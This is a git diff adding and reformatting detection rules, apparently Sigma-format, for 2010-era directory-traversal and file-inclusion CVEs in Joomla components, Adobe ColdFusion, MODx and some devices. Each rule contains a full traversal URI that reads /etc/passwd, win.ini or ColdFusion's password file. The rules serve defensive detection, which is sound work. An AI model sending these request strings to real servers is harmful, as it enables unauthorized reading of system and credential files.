SmartSite (com_smartsite) component + 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12428 +- https://www.cvedetails.com/cve/CVE-2010-1657 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1718.yaml b/rules/web/web_cve_CVE-2010-1718.yaml new file mode 100644 index 00000000..ae4b53e3 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1718.yaml @@ -0,0 +1,24 @@ +title: CVE-2010-1718:Joomla! Component Archery Scores 1.0.6 - Local File Inclusion +id: 60f6f1f4-0312-4416-bb31-fd376a59ce7b +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in archeryscores.php in the Archery + Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to + include and execute arbitrary local files via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1722.yaml b/rules/web/web_cve_CVE-2010-1722.yaml new file mode 100644 index 00000000..f8de4108 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1722.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1722:Joomla! Component Online Market 2.x - Local File Inclusion +id: e33e435a-51b1-416d-b0f3-0965a0b73af9 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Online Market (com_market) component + 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have + unspecified other impact via a .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12177 +- https://www.cvedetails.com/cve/CVE-2010-1722 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1875.yaml b/rules/web/web_cve_CVE-2010-1875.yaml new file mode 100644 index 00000000..48c7d585 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1875.yaml @@ -0,0 +1,26 @@ +title: CVE-2010-1875:Joomla! Component Property - Local File Inclusion +id: d989a93e-8f69-4419-876d-12bd5f9bfc19 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Real Estate Property (com_properties) + component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files + and possibly have unspecified other impact via a .. (dot dot) in the controller + parameter to index.php. +references: +- https://www.exploit-db.com/exploits/11851 +- https://www.cvedetails.com/cve/CVE-2010-1875 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1953.yaml b/rules/web/web_cve_CVE-2010-1953.yaml new file mode 100644 index 00000000..aed73819 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1953.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1953:Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion +id: 88a112bd-6581-4492-8d76-5c984d738c09 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) + component 1.0 for Joomla! allows remote attackers to read arbitrary files via a + .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12288 +- https://www.cvedetails.com/cve/CVE-2010-1953 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1955.yaml b/rules/web/web_cve_CVE-2010-1955.yaml new file mode 100644 index 00000000..c74eeaa7 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1955.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1955:Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion +id: 5eeaa5a1-e6d1-46f8-9bf3-ef141d6733f9 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) + component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via + a .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12238 +- https://www.cvedetails.com/cve/CVE-2010-1955 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1979.yaml b/rules/web/web_cve_CVE-2010-1979.yaml new file mode 100644 index 00000000..ddd153dc --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1979.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1979:Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion +id: 0221e773-afea-48bf-b3b2-dd60ed509720 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) + component build 880 for Joomla! allows remote attackers to read arbitrary files + via a .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/12088 +- https://www.cvedetails.com/cve/CVE-2010-1979 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1983.yaml b/rules/web/web_cve_CVE-2010-1983.yaml new file mode 100644 index 00000000..2d8c8113 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1983.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-1983:Joomla! Component redTWITTER 1.0 - Local File Inclusion +id: b205e0d0-b61a-4a7a-a8db-45225cad643f +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) + component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary + files via a .. (dot dot) in the view parameter to index.php +references: +- https://www.exploit-db.com/exploits/12055 +- https://www.cvedetails.com/cve/CVE-2010-1983 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2033.yaml b/rules/web/web_cve_CVE-2010-2033.yaml new file mode 100644 index 00000000..de4c9b39 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-2033.yaml @@ -0,0 +1,26 @@ +title: CVE-2010-2033:Joomla Percha Categories Tree 0.6 - Local File Inclusion +id: d61b5ebd-9dc8-4dc5-b377-5e7cabfde00e +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) + component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly + have unspecified other impact via a .. (dot dot) in the controller parameter to + index.php. +references: +- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html +- https://www.cvedetails.com/cve/CVE-2010-2033 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2036.yaml b/rules/web/web_cve_CVE-2010-2036.yaml new file mode 100644 index 00000000..b3132266 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-2036.yaml @@ -0,0 +1,26 @@ +title: CVE-2010-2036:Joomla! Component Percha Fields Attach 1.0 - Directory Traversal +id: 1859e4d6-2965-4bee-897f-bded883e7364 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) + component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly + have unspecified other impact via a .. (dot dot) in the controller parameter to + index.php. +references: +- https://www.exploit-db.com/exploits/34004 +- https://www.cvedetails.com/cve/CVE-2010-2036 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2259.yaml b/rules/web/web_cve_CVE-2010-2259.yaml new file mode 100644 index 00000000..3b175aca --- /dev/null +++ b/rules/web/web_cve_CVE-2010-2259.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-2259:Joomla! Component com_bfsurvey - Local File Inclusion +id: 0f74c630-3e11-41d3-8352-66961fc12085 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component + for Joomla! allows remote attackers to include and execute arbitrary local files + via a .. (dot dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/10946 +- https://www.cvedetails.com/cve/CVE-2010-2259 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2307.yaml b/rules/web/web_cve_CVE-2010-2307.yaml new file mode 100644 index 00000000..8d787692 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-2307.yaml @@ -0,0 +1,27 @@ +title: CVE-2010-2307:Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM + - Directory Traversal +id: f03488dd-2c62-4541-9f0e-a11e8a7e1750 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Multiple directory traversal vulnerabilities in the web server for Motorola + SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow + remote attackers to read arbitrary files via (1) "//" (multiple leading slash), + (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. +references: +- https://www.securityfocus.com/bid/40550/info +- https://nvd.nist.gov/vuln/detail/CVE-2010-2307 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /../../etc/passwd + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2682.yaml b/rules/web/web_cve_CVE-2010-2682.yaml new file mode 100644 index 00000000..01a72dff --- /dev/null +++ b/rules/web/web_cve_CVE-2010-2682.yaml @@ -0,0 +1,26 @@ +title: CVE-2010-2682:Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion +id: 99824e58-3cce-4172-9970-04e0a6de5108 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) + component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and + possibly have unspecified other impact via a .. (dot dot) in the controller parameter + to index.php. +references: +- https://www.exploit-db.com/exploits/14017 +- https://www.cvedetails.com/cve/CVE-2010-2682 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-2861.yaml b/rules/web/web_cve_CVE-2010-2861.yaml new file mode 100644 index 00000000..e5764559 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-2861.yaml @@ -0,0 +1,27 @@ +title: CVE-2010-2861:Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI +id: e22f6ee2-341a-44b8-a58b-33a0960fa8e0 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Multiple directory traversal vulnerabilities in the administrator console + in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files + via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, + (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm + in CFIDE/administrator/. +references: +- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 +- http://www.adobe.com/support/security/bulletins/apsb10-18.html +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-3426.yaml b/rules/web/web_cve_CVE-2010-3426.yaml new file mode 100644 index 00000000..d0c9a6c0 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-3426.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-3426:Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion +id: 8df31def-3d71-4f01-85ab-4891fa481a8c +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) + component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute + arbitrary local files via a .. (dot dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-4231.yaml b/rules/web/web_cve_CVE-2010-4231.yaml new file mode 100644 index 00000000..9863413f --- /dev/null +++ b/rules/web/web_cve_CVE-2010-4231.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-4231:Camtron CMNC-200 IP Camera - Directory Traversal +id: e097e932-b39e-4e00-ac6f-1f03e43fc716 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. + The server is vulnerable to directory transversal attacks, allowing access to any + file on the camera file system. +references: +- https://nvd.nist.gov/vuln/detail/CVE-2010-4231 +- https://www.exploit-db.com/exploits/15505 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /../../../../../../../../../../../../../etc/passwd + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-4617.yaml b/rules/web/web_cve_CVE-2010-4617.yaml new file mode 100644 index 00000000..5a1a42e0 --- /dev/null +++ b/rules/web/web_cve_CVE-2010-4617.yaml @@ -0,0 +1,25 @@ +title: CVE-2010-4617:Joomla! Component JotLoader 2.2.1 - Local File Inclusion +id: 3965e578-e509-41e2-a572-12522bbcf4fd +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the JotLoader (com_jotloader) component + 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory + traversal sequences in the section parameter to index.php. +references: +- https://www.exploit-db.com/exploits/15791 +- https://www.cvedetails.com/cve/CVE-2010-4617 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-5278.yaml b/rules/web/web_cve_CVE-2010-5278.yaml new file mode 100644 index 00000000..3618fefc --- /dev/null +++ b/rules/web/web_cve_CVE-2010-5278.yaml @@ -0,0 +1,26 @@ +title: CVE-2010-5278:MODx manager - Local File Inclusion +id: 5f6499cc-97a6-49ed-af28-00278c2c954e +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php + in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, + allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key + parameter. +references: +- https://www.exploit-db.com/exploits/34788 +- https://www.cvedetails.com/cve/CVE-2010-5278 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical From 5022fdc0855e620ccaff110fef44e420d995cd9f Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Wed, 25 Aug 2021 21:11:21 +0530 Subject: [PATCH 0577/1367] Modified Yaml --- rules/web/web_cve_CVE-2010-0943.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-0944.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1306.yaml | 23 ++++++++++++ rules/web/web_cve_CVE-2010-1314.yaml | 46 ++++++++++++------------ rules/web/web_cve_CVE-2010-1345.yaml | 46 ++++++++++++------------ rules/web/web_cve_CVE-2010-1353.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1474.yaml | 52 +++++++++++++-------------- rules/web/web_cve_CVE-2010-1475.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1495.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1532.yaml | 48 ++++++++++++------------- rules/web/web_cve_CVE-2010-1533.yaml | 46 ++++++++++++------------ rules/web/web_cve_CVE-2010-1535.yaml | 48 ++++++++++++------------- rules/web/web_cve_CVE-2010-1602.yaml | 52 +++++++++++++-------------- rules/web/web_cve_CVE-2010-1657.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1718.yaml | 48 ++++++++++++------------- rules/web/web_cve_CVE-2010-1722.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1875.yaml | 52 +++++++++++++-------------- rules/web/web_cve_CVE-2010-1953.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1954.yaml | 23 ++++++++++++ rules/web/web_cve_CVE-2010-1955.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1979.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-1983.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-2033.yaml | 52 +++++++++++++-------------- rules/web/web_cve_CVE-2010-2036.yaml | 52 +++++++++++++-------------- rules/web/web_cve_CVE-2010-2259.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-2307.yaml | 54 ++++++++++++++-------------- rules/web/web_cve_CVE-2010-2682.yaml | 52 +++++++++++++-------------- rules/web/web_cve_CVE-2010-2861.yaml | 54 ++++++++++++++-------------- rules/web/web_cve_CVE-2010-3426.yaml | 46 ++++++++++++------------ rules/web/web_cve_CVE-2010-4231.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-4617.yaml | 50 +++++++++++++------------- rules/web/web_cve_CVE-2010-5278.yaml | 52 +++++++++++++-------------- 32 files changed, 796 insertions(+), 750 deletions(-) create mode 100644 rules/web/web_cve_CVE-2010-1306.yaml create mode 100644 rules/web/web_cve_CVE-2010-1954.yaml diff --git a/rules/web/web_cve_CVE-2010-0943.yaml b/rules/web/web_cve_CVE-2010-0943.yaml index e90c6aab..59e19742 100644 --- a/rules/web/web_cve_CVE-2010-0943.yaml +++ b/rules/web/web_cve_CVE-2010-0943.yaml @@ -1,25 +1,25 @@ -title: CVE-2010-0943:Joomla! Component com_jashowcase - Directory Traversal -id: a7b7151c-99e5-444b-89db-df927d1055ed -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) - component for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the controller parameter in a jashowcase action to index.php. -references: -- https://www.exploit-db.com/exploits/11090 -- https://www.cvedetails.com/cve/CVE-2010-0943 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-0943:Joomla! Component com_jashowcase - Directory Traversal +id: 6a99f28f-8626-4419-93c8-9aa9e75c0068 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) + component for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the controller parameter in a jashowcase action to index.php. +references: +- https://www.exploit-db.com/exploits/11090 +- https://www.cvedetails.com/cve/CVE-2010-0943 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-0944.yaml b/rules/web/web_cve_CVE-2010-0944.yaml index 22499499..2872b219 100644 --- a/rules/web/web_cve_CVE-2010-0944.yaml +++ b/rules/web/web_cve_CVE-2010-0944.yaml @@ -1,25 +1,25 @@ -title: CVE-2010-0944:Joomla! Component com_jcollection - Directory Traversal -id: c3a5750d-210b-4a15-b1f7-17444d634a6a -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the JCollection (com_jcollection) - component for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/11088 -- https://www.cvedetails.com/cve/CVE-2010-0944 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-0944:Joomla! Component com_jcollection - Directory Traversal +id: ae369f4d-5f22-4969-8715-c8908394f279 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the JCollection (com_jcollection) + component for Joomla! allows remote attackers to read arbitrary files via a .. (dot + dot) in the controller parameter to index.php. +references: +- https://www.exploit-db.com/exploits/11088 +- https://www.cvedetails.com/cve/CVE-2010-0944 +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1306.yaml b/rules/web/web_cve_CVE-2010-1306.yaml new file mode 100644 index 00000000..2b48098e --- /dev/null +++ b/rules/web/web_cve_CVE-2010-1306.yaml @@ -0,0 +1,23 @@ +title: CVE-2010-1306:Joomla! Component Picasa 2.0 - Local File Inclusion +id: 3cea101d-f72d-441f-8fdc-8462cfac20e7 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component + 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files + via a .. (dot dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1314.yaml b/rules/web/web_cve_CVE-2010-1314.yaml index 324e4a66..8673ae89 100644 --- a/rules/web/web_cve_CVE-2010-1314.yaml +++ b/rules/web/web_cve_CVE-2010-1314.yaml @@ -1,23 +1,23 @@ -title: CVE-2010-1314:Joomla! Component Highslide 1.5 - Local File Inclusion -id: 226602ff-06ce-4173-9b87-7c2d62b4b3a4 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) - component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files - via a .. (dot dot) in the controller parameter to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1314:Joomla! Component Highslide 1.5 - Local File Inclusion +id: 9a7d17b2-ba50-4f83-bd75-92bcb0ba190f +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) + component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files + via a .. (dot dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1345.yaml b/rules/web/web_cve_CVE-2010-1345.yaml index 187b3f3c..29326297 100644 --- a/rules/web/web_cve_CVE-2010-1345.yaml +++ b/rules/web/web_cve_CVE-2010-1345.yaml @@ -1,23 +1,23 @@ -title: CVE-2010-1345:Joomla! Component Cookex Agency CKForms - Local File Inclusion -id: ff1015cf-e991-458c-a999-67e30fd34f9a -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) - component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via - a .. (dot dot) in the controller parameter to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical +title: CVE-2010-1345:Joomla! Component Cookex Agency CKForms - Local File Inclusion +id: dc5198bb-73cc-4a07-8b6c-b178d6c25265 +Author: Subhash Popuri (@pbssubhash) +date: 25/08/2021 +status: experimental +description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) + component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via + a .. (dot dot) in the controller parameter to index.php. +references: +- https://github.com/projectdiscovery/nuclei-templates +detection: + selection: + c-uri|contains: + - /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 + condition: selection +false_positives: +- Scanning from Nuclei +- Penetration Testing Activity +- Unknown +tags: +- attack.initial_access +- attack.t1190 +level: critical diff --git a/rules/web/web_cve_CVE-2010-1353.yaml b/rules/web/web_cve_CVE-2010-1353.yaml index 77a9f02b..772094e3 100644 --- a/rules/web/web_cve_CVE-2010-1353.yaml +++ b/rules/web/web_cve_CVE-2010-1353.yaml @@ -1,25 +1,25 @@ -title: CVE-2010-1353:Joomla! Component LoginBox - Local File Inclusion -id: dee9b22f-1e7c-44ec-ad34-555ea35c0a6e -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) - component for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the view parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12068 -- https://www.cvedetails.com/cve/CVE-2010-1353 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - 